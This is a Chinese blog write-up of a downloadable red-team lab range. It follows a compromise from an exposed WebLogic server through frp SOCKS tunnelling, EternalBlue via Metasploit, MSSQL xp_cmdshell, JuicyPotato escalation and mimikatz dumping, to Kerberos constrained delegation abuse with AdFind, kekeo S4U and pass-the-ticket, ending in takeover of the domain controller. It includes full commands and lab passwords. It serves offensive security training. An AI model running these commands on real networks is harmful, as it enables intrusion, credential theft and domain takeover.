MENU

委派攻击-渗透攻击红队内外域环境靶场

August 31, 2022 • Read: 525 • Penetration testing

前言

抓马学累了,来玩玩内网吧
靶场下载地址:

https://pan.baidu.com/s/1DOaDrsDsB2aW0sHSO_-fZQ

提取码: vbi2

环境搭建

93C47B25E6CB51C1F090B1109F162DA0.png

按照图片配置网卡,为了能ping通,我配了一下外网机器的出入站规则
外网机器:

ip:192.168.0.154
ip:10.10.20.12

个人pc:

ip:10.10.20.7
ip:10.10.10.7

数据库主机:

ip:10.10.10.18

域控主机:

ip:10.10.10.8

保证每台主机都能互相ping通,然后开启外网机器打weblogic服务

外网打点

先进行端口扫描,在端口扫描时指定端口可以提高速度和精度

nmap -v -Pn -T3 -sV -n -sT --open -p 22,1222,2222,22345,23,21,445,135,139,5985,2121,3389,13389,6379,4505,1433,3306,5000,5236,5900,5432,1521,1099,53,995,8140,993,465,878,7001,389,902,1194,1080,88 192.168.0.154

4AFBED6E8F5422D2702CCB18E698CE8D.png

发现熟悉的7001端口就是之前我们开启的weblogic服务,直接去github上找相关的漏扫工具
工具地址:https://github.com/rabbitmask/WeblogicScan
469D323B02761F6AA0CAA200ECED0CC1.jpg

发现这么多cve,后面抽空学一手那几个经典的weblogic反序列化和xxe的漏洞,这里就直接找个工具来打了
工具地址:https://github.com/shack2/javaserializetools/releases

5836270DCC9911473D48428DE7D6112B.png

而且没有杀软
F801F5ED1A60F250C8B2AEAE73991BE8.png

直接用powershell来上线cs
C7AE5C1A5D651D3549947EB96D43A071.png

内网渗透

信息收集

发现有两个ip,并且现在是一个工作组环境
79546AD0ACFFAFF59F06342CCE8A4EA5.png

显而易见10.10.20.1这个网关为域环境
再看一下系统和补丁

shell systeminfo

9E7E56543FEA0872D9C33C08CCEDA918.png

D5A429011127D97AFFA97EC02DACD303.png

显而易见10.10.20.1这个网关为域环境,因为目标靶机为2012R2,我们知道win10和它默认是禁止保存明文密码的
所以不用去抓密码,要抓需要先修改注册表参数
那我们看看本地用户有哪些,知道一般sysytem是为域用户的
5F244079E96899BED6427B15041B51A4.png

下不了手,回过头我们还的看看10.10.20.1这个网关下存活的主机,从其他主机进入域
扫描其他主机用了这么一个插件的扫描工具:https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts

倒入然后上传就行
88B944DB43180EF985F6E6164CFAAE0B.png

然后就是利用进行主机扫描了
44CE52CE6D314A910A71AD2860E78335.png

然后我们要对这台主机进行端口扫描,还是那一套就是fscan,提醒我了自己要做一个垃圾库集合(不是)
利用文件管理把我们的fscan上传上去
4049E39BCA644019F0C474483F96CB5E.png

然后进行漏扫描

shell fscan64.exe -h 10.10.20.7

301CED1C1E4E471E9C49BFEC78305157.png

发现存在永恒之蓝

内网穿透

配置一下frpc.ini

[common]
server_addr = 攻击机ip
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5

我们上传个frpc.exe和frpc.ini
F30E3DD19D2A8C29D9324C5644B485FE.png

然后我们再配置一下frps.ini

[common]
bind_addr =0.0.0.0
bind_port = 7000

先运行攻击机的,都是amd64版本的只是一个手linux一个是windows的
AD3755336E0F7EF17BAF39F6A3E9A417.png

然后运行我们靶机的就行
82B0F380EDADD4BB25341C32934A0EA1.png

好,现在靶机可以访问的ip我们都能访问了,就是来打永恒之蓝了
这里我们使用msf

msf6 > setg Proxies socks5:127.0.0.1:7777
msf6 > setg ReverseAllowProxy true
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > set payload windows/x64/meterpreter/bind_tcp
msf6 > set rhost 10.10.20.7
msf6 > run

09C57FCC56D34F9DF3A6D839B42CF01C.png

成功上线,我们来msf派生cs,cs生成后门上传运行
D85C2C204EB064BFF4A7E624AF4B949E.png

然后我们就发现cs上线了
7BB5659145FF1186C98494991F431C48.png

然后就继续信息收集一波
看一下域内机器
9099BD4DF4FB23B25122645ABB48537A.png

然后就是网卡信息之类,定位域控,补丁什么的,这就不多说了,懂得都懂
然后就是对这两台机器进行扫描,同样使用fscan
域控机器
782DD750E24193831308C363A5CAC3A2.png

数据库机器
9B6F52E8623D66AA712F7DFD622B0643.png

发现数据的账号密码都给我们了,而且查看进程发现这台机子并未有域控进程,所以直接攻击域控被我抛弃了
有数据库密码了我们就需要去找一个利用工具:https://github.com/SafeGroceryStore/MDUT
然后设置一个全局代理,因为我们要进第二层内网了
我们先去pc上开启一个socks4的端口

106119CD0B9EBA9E4F83B30D24E9315B.png

然后在我们攻击机上面进行代理proxychains
29CA073F00E5E068E5EAD4C552B8BCDC.png

然后进行利用MDUT
B1718C7E4A74F32059FB8F81A9CD6363.png

然后我们新建进行测试链接
316668CC5863F8C466BD67B115A1ADA8.png

成功链接了,打开之后先走左上角激活XP_Cmdshell组件,之后可以利用了
2039C3290EC3091F5662572EC8B0053D.png

发现有文件管理,我们也上传之前那个m1.exe,也需要在左上角开启我们的Ole Automation组件
8E916EA343010A357E68F4D6AEE2B35D.png

上传成功之后,用命令执行运行之后我们去连接它,成功上线
33A52C8498F18A491E5CBA5E7C9332A8.png

攻击域控

现在只是一个服务权限,我们需要提权,这里使用juicy-potato
工具地址:https://github.com/ohpe/juicy-potato

然后用cs上传即可,也把我们m1.exe一起上传之后进行利用
参照:https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md
选择相应的CLSD

shell C:\Windows\system32\JuicyPotato.exe  -l 1111 -p C:\Windows\system32\m1.exe  -c {35172920-A700-11D0-A9EA-00AA00685C74} -t *

然后得到我们的shell
3B335017E93E2FB5193F663CFB7465CB.png

密码抓取得到我们的sqlsver的密码和saul的密码,都是mimikatz
6D352CAD851841C165F581F7F83AD9F5.png

BDDC49A05D5ED2B131D3EF4564D4EED7.png

首先我们得了解什么是委派攻击https://whoamianony.top/domain-delegation-attack/
然后我们需要看看有无有委派攻击的机器,还需要一个工具
https://github.com/mai-lang-chai/AD-Penetration-Testing-Tools

shell C:\Windows\system32\AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto

7ED93C7EB5C3E7D76872FE71C7064367.png

发现确实sqlsver存在约束性委派,然后我们再上传个工具获取sqlsver的TGT
工具地址:https://github.com/gentilkiwi/kekeo

shell C:\Windows\system32\kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:test.kirbi " "exit"

A00010C25E2870849D3CFBA57AF46C87.png

得到sqlserver的TGT,然后就是就用这张可转发的TGT票据去伪造s4u请求以administrador用户权限访问SPN委派服务

shell C:\Windows\system32\kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red/service:cifs/owa.redteam.red" "exit"

691F247B6BDFEE65C73A9D8FC4810E3A.png

然后我们将从域控获取到的owa CIFS服务的ST2导入进当会话
576029891BCC9E20230526883F87CC81.png

发现不行,那就用mimikatz 将 ST2 导入当前会话即可,运行 mimikatz 进行 ptt

mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi

58E51F127A631A6BBE3D02CE34D23487.png

成功拿下域控
截屏2022-09-02 15.23.26.png

总结

抓马,继续学抓马

参考链接:https://mp.weixin.qq.com/s?__biz=MzkxNDEwMDA4Mw==&mid=2247488950&idx=1&sn=48d93f1fac38eae99cc4e78474eb557c&chksm=c172cfaaf60546bc3f4bfee09181c0f3f07b0c8ba5e9d9a9a0ee92ffc734aff8fe94acb2967c&scene=178&cur_album_id=1576393578573004800#rd
参考链接:https://blog.csdn.net/q20010619/article/details/124658712

Last Modified: September 4, 2022
Archives Tip
QR Code for this page
Tipping QR Code